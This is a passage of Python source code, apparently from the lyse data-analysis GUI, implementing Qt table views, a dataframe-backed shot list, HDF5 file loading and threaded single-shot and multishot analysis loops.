self.old_columns_visible[index] = old_columns_visible_by_name[name]
except KeyError:
# A new column. If editing is cancelled, any new columns
# should be set to visible:
self.old_columns_visible[index] = True
self.populate_model(column_names, self.columns_visible)
def show(self):
self.old_columns_visible = self.columns_visible.copy()
self.ui.show()
def close(self):
self.columns_visible = self.old_columns_visible.copy()
self.filebox.set_columns_visible(self.columns_visible)
self.populate_model(self.column_names, self.columns_visible)
self.ui.hide()
def cancel(self):
self.ui.close()
def make_it_so(self):
self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and a progress bar in one column"""
EXTRA_ROW_HEIGHT = 2
def __init__(self, view, model, col_status, role_status_percent):
self.view = view
self.model = model
self.COL_STATUS = col_status
self.ROLE_STATUS_PERCENT = role_status_percent
QtWidgets.QStyledItemDelegate.__init__(self)
def sizeHint(self, *args):
fontmetrics = QtGui.QFontMetrics(self.view.font())
text_height = fontmetrics.height()
row_height = text_height + self.EXTRA_ROW_HEIGHT
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), row_height)
def paint(self, painter, option, index):
if index.column() == self.COL_STATUS:
status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
if status_percent == 100:
# Render as a normal item - this shows whatever icon is set instead of a progress bar.
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
else:
# Method of rendering a progress bar into the view copied from
# Qt's 'network-torrent' example:
# http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
# Set up a QStyleOptionProgressBar to precisely mimic the
# environment of a progress bar.
progress_bar_option = QtWidgets.QStyleOptionProgressBar()
progress_bar_option.state = QtWidgets.QStyle.State_Enabled
progress_bar_option.direction = qapplication.layoutDirection()
progress_bar_option.rect = option.rect
progress_bar_option.fontMetrics = qapplication.fontMetrics()
progress_bar_option.minimum = 0
progress_bar_option.maximum = 100
progress_bar_option.textAlignment = QtCore.Qt.AlignCenter
progress_bar_option.textVisible = True
# Set the progress and text values of the style option.
progress_bar_option.progress = status_percent
progress_bar_option.text = '%d%%' % status_percent
# Draw the progress bar onto the view.
qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, progress_bar_option, painter)
else:
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
class UneditableModel(QtGui.QStandardItemModel):
def flags(self, index):
"""Return flags as normal except that the ItemIsEditable
flag is always False"""
result = QtGui.QStandardItemModel.flags(self, index)
return result & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTableView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Multiple inheritance of QObjects is not possible, so we
are forced to duplicate code instead of sharing code with the extremely
similar TreeView class in this module"""
def __init__(self, *args):
QtWidgets.QTableView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTableView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTableView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class DataFrameModel(QtCore.QObject):
COL_STATUS = 0
COL_FILEPATH = 1
ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2
columns_changed = Signal()
def __init__(self, view, exp_config):
QtCore.QObject.__init__(self)
self._view = view
self.exp_config = exp_config
self._model = UneditableModel()
self.row_number_by_filepath = {}
self._previous_n_digits = 0
self._header = HorizontalHeaderViewWithWidgets(self._model)
self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
# Smaller font for headers:
font = self._vertheader.font()
font.setPointSize(10 if sys.platform == 'darwin' else 8)
self._header.setFont(font)
font.setFamily('Ubuntu Mono')
self._vertheader.setFont(font)
self._vertheader.setHighlightSections(True)
self._vertheader.setSectionsClickable(True)
self._view.setModel(self._model)
self._view.setHorizontalHeader(self._header)
self._view.setVerticalHeader(self._vertheader)
self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
self._view.setItemDelegate(self._delegate)
self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Check if integer indexing is to be used
try:
self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.integer_indexing = False
# This dataframe will contain all the scalar data
# from the shot files that are currently open:
index = pandas.MultiIndex.from_tuples([('filepath', '')])
self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
# How many levels the dataframe's multiindex has:
self.nlevels = self.dataframe.columns.nlevels
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('status/progress of single-shot analysis')
self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
filepath_item = QtGui.QStandardItem('filepath')
filepath_item.setToolTip('filepath')
self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
self._view.setColumnWidth(self.COL_STATUS, 70)
self._view.setColumnWidth(self.COL_FILEPATH, 100)
# Column indices to names and vice versa for fast lookup:
self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
# Whether or not a deleted column was visible at the time it was deleted (by name):
self.deleted_columns_visible = {}
# Make the actions for the context menu:
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
self.connect_signals()
def connect_signals(self):
self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selection_model = self._view.selectionModel()
selected_indexes = selection_model.selectedRows()
selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
if not selected_name_items:
return
if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
return
# Remove from DataFrame first:
self.dataframe = self.dataframe.drop(index.row() for index in selected_indexes)
self.dataframe.index = pandas.Index(range(len(self.dataframe)))
# Delete one at a time from Qt model:
for name_item in selected_name_items:
row = name_item.row()
self._model.removeRow(row)
self.renumber_rows()
def mark_selection_not_done(self):
selected_indexes = self._view.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_DELETED_OFF_DISK):
# If the shot was previously not readable on disk, check to
# see if it's readable now. It may have been undeleted or
# perhaps it being unreadable before was due to a network
# glitch or similar.
filepath = self._model.item(row, self.COL_FILEPATH).text()
if not os.path.exists(filepath):
continue
                # Shot file is accessible again:
status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
status_item.setToolTip(None)
status_item.setData(0, self.ROLE_STATUS_PERCENT)
def on_view_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self._view)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_double_click(self, index):
filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
shot_filepath = filepath_item.text()
# get path to text editor
viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
        # Check that an hdf5 viewer is configured before trying to launch it:
        if not viewer_path:
            error_dialog("No hdf5 viewer specified in the labconfig.")
            return
if '{file}' in viewer_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
viewer_args = [shot_filepath] + viewer_args.split()
try:
subprocess.Popen([viewer_path] + viewer_args)
except Exception as e:
error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def set_columns_visible(self, columns_visible):
self.columns_visible = columns_visible
for column_index, visible in columns_visible.items():
self._view.setColumnHidden(column_index, not visible)
def update_column_levels(self):
"""Pads the keys and values of our lists of column names so that
they still match those in the dataframe after the number of
levels in its multiindex has increased (the number of levels never
decreases, given the current implementation of concat_with_padding())"""
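        # Illustrative example (hypothetical names): if the multiindex grows
        # from 2 to 3 levels, a stored column name ('alice', 'x') is padded to
        # ('alice', 'x', '') so it still matches the dataframe, while special
        # non-tuple names like '__status' are left untouched.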
extra_levels = self.dataframe.columns.nlevels - self.nlevels
if extra_levels > 0:
self.nlevels = self.dataframe.columns.nlevels
column_indices = {}
column_names = {}
for column_name in self.column_indices:
if not isinstance(column_name, tuple):
# It's one of our special columns
new_column_name = column_name
else:
new_column_name = column_name + ('',) * extra_levels
column_index = self.column_indices[column_name]
column_indices[new_column_name] = column_index
column_names[column_index] = new_column_name
self.column_indices = column_indices
self.column_names = column_names
@inmain_decorator()
def mark_as_deleted_off_disk(self, filepath):
# Confirm the shot hasn't been removed from lyse (we are in the main
# thread so there is no race condition in checking first)
        if filepath not in self.dataframe['filepath'].values:
# Shot has been removed from FileBox, nothing to do here:
return
row_number = self.row_number_by_filepath[filepath]
status_item = self._model.item(row_number, self.COL_STATUS)
already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
if already_marked_as_deleted:
return
# Icon only displays if percent completion is 100. This is also
# important so that the shot is not picked up as analysis
# incomplete and analysis re-attempted on it.
status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setToolTip("Shot has been deleted off disk or is unreadable")
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)
@inmain_decorator()
def infer_objects(self):
"""Convert columns in the dataframe with dtype 'object' into compatible, more
specific types, if possible. This improves pickling performance and ensures
multishot analysis code does not encounter columns with dtype 'object' for
non-mixed numerical data, which it might choke on.
"""
self.dataframe = self.dataframe.infer_objects()
@inmain_decorator()
def update_row(self, filepath, dataframe_already_updated=False, new_row_data=None, updated_row_data=None):
""""Updates a row in the dataframe and Qt model to the data in the HDF5 file for
that shot."""
# To speed things up block signals to the model during update
self._model.blockSignals(True)
# Update the row in the dataframe first:
if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
assert filepath == self.dataframe.at[row_number, filepath_colname]
if updated_row_data is not None and not dataframe_already_updated:
for group, name in updated_row_data:
column_name = (group, name) + ('',) * (self.nlevels - 2)
value = updated_row_data[group, name]
try:
self.dataframe.at[row_number, column_name] = value
except ValueError:
# did the column not already exist when we tried to set an iterable?
                    if column_name not in self.dataframe.columns:
# create it with a non-iterable and then overwrite with the iterable value:
self.dataframe.at[row_number, column_name] = None
else:
# Incompatible datatype - convert the datatype of the column to
# 'object'
self.dataframe[column_name] = self.dataframe[column_name].astype('object')
# Now that the column exists and has dtype object, we can set the value:
self.dataframe.at[row_number, column_name] = value
dataframe_already_updated = True
if not dataframe_already_updated:
if new_row_data is None:
raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
"by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
self.update_column_levels()
# Check and create necessary new columns in the Qt model:
new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
new_columns_start = self._model.columnCount()
self._model.insertColumns(new_columns_start, len(new_column_names))
for i, column_name in enumerate(sorted(new_column_names)):
# Set the header label of the new column:
column_number = new_columns_start + i
self.column_names[column_number] = column_name
self.column_indices[column_name] = column_number
if column_name in self.deleted_columns_visible:
# Restore the former visibility of this column if we've
# seen one with its name before:
visible = self.deleted_columns_visible[column_name]
self.columns_visible[column_number] = visible
self._view.setColumnHidden(column_number, not visible)
else:
# new columns are visible by default:
self.columns_visible[column_number] = True
column_name_as_string = '\n'.join(column_name).strip()
header_item = QtGui.QStandardItem(column_name_as_string)
header_item.setToolTip(column_name_as_string)
self._model.setHorizontalHeaderItem(column_number, header_item)
# Check and remove any no-longer-needed columns in the Qt model:
defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
- {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
for column_number in sorted(defunct_column_indices, reverse=True):
# Remove columns from the Qt model. In reverse order so that
# removals do not change the position of columns yet to be
# removed.
self._model.removeColumn(column_number)
# Save whether or not the column was visible when it was
# removed (so that if it is re-added the visibility will be retained):
self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
del self.column_names[column_number]
del self.columns_visible[column_number]
if defunct_column_indices:
# Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
# Update the inverse mapping of self.column_names:
self.column_indices = {name: index for index, name in self.column_names.items()}
# Update the data in the Qt model:
dataframe_row = self.dataframe.iloc[row_number].to_dict()
for column_number, column_name in self.column_names.items():
if not isinstance(column_name, tuple):
# One of our special columns, does not correspond to a column in the dataframe:
continue
if updated_row_data is not None:
# Must remove empty strings from tuple to compare with updated_row_data:
if tuple(s for s in column_name if s) not in updated_row_data:
continue
value = dataframe_row[column_name]
if isinstance(value, float):
value_str = scientific_notation(value)
else:
value_str = str(value)
lines = value_str.splitlines()
if len(lines) > 1:
short_value_str = lines[0] + ' ...'
else:
short_value_str = value_str
item = self._model.item(row_number, column_number)
if item is None:
# This is the first time we've written a value to this part of the model:
item = QtGui.QStandardItem(short_value_str)
item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
self._model.setItem(row_number, column_number, item)
else:
item.setText(short_value_str)
item.setToolTip(repr(value))
for i, column_name in enumerate(sorted(new_column_names)):
# Resize any new columns to fit contents:
column_number = new_columns_start + i
self._view.resizeColumnToContents(column_number)
if new_column_names or defunct_column_names:
self.columns_changed.emit()
# unblock signals to the model and tell it to update
self._model.blockSignals(False)
self._model.layoutChanged.emit()
@inmain_decorator()
def set_status_percent(self, filepath, status_percent):
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
status_item = self._model.item(row_number, self.COL_STATUS)
status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
def new_row(self, filepath, done=False):
status_item = QtGui.QStandardItem()
if done:
status_item.setData(100, self.ROLE_STATUS_PERCENT)
            status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
else:
status_item.setData(0, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
name_item = QtGui.QStandardItem(filepath)
return [status_item, name_item]
def renumber_rows(self, add_from=0):
"""Add/update row indices - the rows are numbered in simple sequential
order for easy comparison with the dataframe. add_from allows you to
only add numbers for new rows from the given index as a performance
optimisation, though if the number of digits changes, all rows will
still be renumbered. add_from should not be used if rows have been
deleted."""
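        # Illustrative example: with 9 rows, n_digits is 1 and labels start
        # '0. ', '1. ', ...; adding a 10th row makes n_digits 2, so every
        # label is rewritten with the new padding regardless of add_from.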
n_digits = len(str(self._model.rowCount()))
if n_digits != self._previous_n_digits:
# All labels must be updated:
add_from = 0
self._previous_n_digits = n_digits
if add_from == 0:
self.row_number_by_filepath = {}
for row_number in range(add_from, self._model.rowCount()):
vertical_header_item = self._model.verticalHeaderItem(row_number)
row_number_str = str(row_number).rjust(n_digits)
vert_header_text = '{}. '.format(row_number_str)
filepath_item = self._model.item(row_number, self.COL_FILEPATH)
filepath = filepath_item.text()
self.row_number_by_filepath[filepath] = row_number
if self.integer_indexing:
header_cols = ['sequence_index', 'run number', 'run repeat']
header_strings = []
for col in header_cols:
val = self.dataframe[col].values[row_number]
if pandas.notna(val):
header_strings.append('{:04d}'.format(val))
else:
header_strings.append('----')
vert_header_text += ' | '.join(header_strings)
else:
basename = os.path.splitext(os.path.basename(filepath))[0]
vert_header_text += basename
vertical_header_item.setText(vert_header_text)
@inmain_decorator()
def add_files(self, filepaths, new_row_data, done=False):
"""Add files to the dataframe model. New_row_data should be a
dataframe containing the new rows."""
to_add = []
# Check for duplicates:
for filepath in filepaths:
if filepath in self.row_number_by_filepath or filepath in to_add:
app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
if new_row_data is not None:
df_row_index = np.where(new_row_data['filepath'].values == filepath)
new_row_data = new_row_data.drop(df_row_index[0])
new_row_data.index = pandas.Index(range(len(new_row_data)))
else:
to_add.append(filepath)
assert len(new_row_data) == len(to_add)
if to_add:
# Update the dataframe:
self.dataframe = concat_with_padding(self.dataframe, new_row_data)
self.update_column_levels()
app.filebox.set_add_shots_progress(None, None, "updating filebox")
for filepath in to_add:
# Add the new rows to the Qt model:
self._model.appendRow(self.new_row(filepath, done=done))
vert_header_item = QtGui.QStandardItem('...loading...')
self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
self._view.resizeRowToContents(self._model.rowCount() - 1)
self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
# Update the Qt model:
for filepath in to_add:
self.update_row(filepath, dataframe_already_updated=True)
@inmain_decorator()
def get_first_incomplete(self):
"""Returns the filepath of the first shot in the model that has not
been analysed"""
for row in range(self._model.rowCount()):
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
filepath_item = self._model.item(row, self.COL_FILEPATH)
return filepath_item.text()
class FileBox(object):
def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
self.exp_config = exp_config
self.to_singleshot = to_singleshot
self.to_multishot = to_multishot
self.from_singleshot = from_singleshot
self.from_multishot = from_multishot
self.logger = logging.getLogger('lyse.FileBox')
self.logger.info('starting')
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
self.ui.progressBar_add_shots.hide()
container.addWidget(self.ui)
self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.connect_signals()
self.analysis_paused = False
self.multishot_required = False
# An Event to let the analysis thread know to check for shots that
# need analysing, rather than using a time.sleep:
self.analysis_pending = threading.Event()
# The folder that the 'add shots' dialog will open to:
self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# A queue for storing incoming files from the ZMQ server so
# the server can keep receiving files even if analysis is slow
# or paused:
self.incoming_queue = queue.Queue()
# Start the thread to handle incoming files, and store them in
# a buffer if processing is paused:
self.incoming = threading.Thread(target=self.incoming_buffer_loop)
self.incoming.daemon = True
self.incoming.start()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
self.shots_model.columns_changed.connect(self.on_columns_changed)
self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
def on_edit_columns_clicked(self):
self.edit_columns_dialog.show()
def on_columns_changed(self):
column_names = self.shots_model.column_names
columns_visible = self.shots_model.columns_visible
self.edit_columns_dialog.update_columns(column_names, columns_visible)
def on_add_shot_files_clicked(self):
shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if type(shot_files) is tuple:
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
self.incoming_queue.put(filepath)
def on_analysis_running_toggled(self, pressed):
if pressed:
self.analysis_paused = True
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis paused')
else:
self.analysis_paused = False
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis running')
self.analysis_pending.set()
def on_mark_selection_not_done_clicked(self):
self.shots_model.mark_selection_not_done()
# Let the analysis loop know to look for these shots:
self.analysis_pending.set()
def on_run_multishot_analysis_clicked(self):
self.multishot_required = True
self.analysis_pending.set()
def set_columns_visible(self, columns_visible):
self.shots_model.set_columns_visible(columns_visible)
@inmain_decorator()
def set_add_shots_progress(self, completed, total, message):
self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
if completed == total and message is None:
self.ui.progressBar_add_shots.hide()
else:
if total is not None:
self.ui.progressBar_add_shots.setMaximum(total)
if completed is not None:
self.ui.progressBar_add_shots.setValue(completed)
if self.ui.progressBar_add_shots.isHidden():
self.ui.progressBar_add_shots.show()
if completed is None and total is None and message is not None:
# Ensure a repaint when only the message changes:
self.ui.progressBar_add_shots.repaint()
def incoming_buffer_loop(self):
"""We use a queue as a buffer for incoming shots. We don't want to hang and not
respond to a client submitting shots, so we just let shots pile up here until we can get to them.
The downside to this is that we can't return errors to the client if the shot cannot be added,
but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
        the experiment on account of errors from the analysis stage, so what's the point of passing errors to it?
We'll just raise errors here and the user can decide what to do with them."""
logger = logging.getLogger('lyse.FileBox.incoming')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
n_shots_added = 0
while True:
try:
filepaths = []
filepath = self.incoming_queue.get()
filepaths.append(filepath)
if self.incoming_queue.qsize() == 0:
# Wait momentarily in case more arrive so we can batch process them:
time.sleep(0.1)
# Batch process to decrease number of dataframe concatenations:
batch_size = len(self.shots_model.dataframe) // 3 + 1
while True:
try:
filepath = self.incoming_queue.get(False)
except queue.Empty:
break
else:
filepaths.append(filepath)
if len(filepaths) >= batch_size:
break
logger.info('adding:\n%s' % '\n'.join(filepaths))
if n_shots_added == 0:
total_shots = self.incoming_queue.qsize() + len(filepaths)
self.set_add_shots_progress(1, total_shots, "reading shot files")
# Remove duplicates from the list (preserving order) in case the
# client sent the same filepath multiple times:
filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
# We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
dataframes = []
indices_of_files_not_found = []
for i, filepath in enumerate(filepaths):
try:
dataframe = get_dataframe_from_shot(filepath)
dataframes.append(dataframe)
except IOError:
app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
indices_of_files_not_found.append(i)
n_shots_added += 1
shots_remaining = self.incoming_queue.qsize()
total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
if dataframes:
new_row_data = concat_with_padding(*dataframes)
else:
new_row_data = None
# Do not add the shots that were not found on disk. Reverse
# loop so that removing an item doesn't change the indices of
# subsequent removals:
for i in reversed(indices_of_files_not_found):
del filepaths[i]
if filepaths:
self.shots_model.add_files(filepaths, new_row_data)
# Let the analysis loop know to look for new shots:
self.analysis_pending.set()
if shots_remaining == 0:
self.set_add_shots_progress(n_shots_added, total_shots, None)
n_shots_added = 0 # reset our counter for the next batch
except Exception:
# Keep this incoming loop running at all costs, but make the
# otherwise uncaught exception visible to the user:
zprocess.raise_exception_in_thread(sys.exc_info())
def analysis_loop(self):
logger = logging.getLogger('lyse.FileBox.analysis_loop')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
try:
self.analysis_pending.wait()
self.analysis_pending.clear()
at_least_one_shot_analysed = False
while True:
if not self.analysis_paused:
# Find the first shot that has not finished being analysed:
filepath = self.shots_model.get_first_incomplete()
if filepath is not None:
logger.info('analysing: %s'%filepath)
self.do_singleshot_analysis(filepath)
at_least_one_shot_analysed = True
if filepath is None and at_least_one_shot_analysed:
self.multishot_required = True
if filepath is None:
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
else:
logger.info('analysis is paused')
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
except Exception:
etype, value, tb = sys.exc_info()
orig_exception = ''.join(traceback.format_exception_only(etype, value))
message = ('Analysis loop encountered unexpected exception. ' +
'This is a bug and should be reported. The analysis ' +
'loop is continuing, but lyse may be in an inconsistent state. '
'Restart lyse, or continue at your own risk. '
'Original exception was:\n\n' + orig_exception)
# Raise the exception in a thread so we can keep running
zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
self.pause_analysis()
@inmain_decorator()
def pause_analysis(self):
# This automatically triggers the slot that sets self.analysis_paused
self.ui.pushButton_analysis_running.setChecked(True)
def do_singleshot_analysis(self, filepath):
# Check the shot file exists before sending it to the singleshot
# routinebox. This does not guarantee it won't have been deleted by
# the time the routinebox starts running analysis on it, but by
# detecting it now we can most of the time avoid the user code
# coughing exceptions due to the file not existing. Which would also
# not be a problem, but this way we avoid polluting the outputbox with
# more errors than necessary.
if not os.path.exists(filepath):
self.shots_model.mark_as_deleted_off_disk(filepath)
return
self.to_singleshot.put(filepath)
while True:
signal, status_percent, updated_data = self.from_singleshot.get()
for file in updated_data:
# Update the data for all the rows with new data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
            # Update the status percent for the row on which analysis is actually
# running:
if status_percent is not None:
self.shots_model.set_status_percent(filepath, status_percent)
if signal == 'done':
return
if signal == 'error':
if not os.path.exists(filepath):
# Do not pause if the file has been deleted. An error is
# no surprise there:
self.shots_model.mark_as_deleted_off_disk(filepath)
else:
self.pause_analysis()
return
if signal == 'progress':
continue
raise ValueError('invalid signal %s' % str(signal))
def do_multishot_analysis(self):
self.to_multishot.put(None)
while True:
signal, _, updated_data = self.from_multishot.get()
for file in updated_data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
if signal == 'done':
self.multishot_required = False
return
elif signal == 'error':
self.pause_analysis()
return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
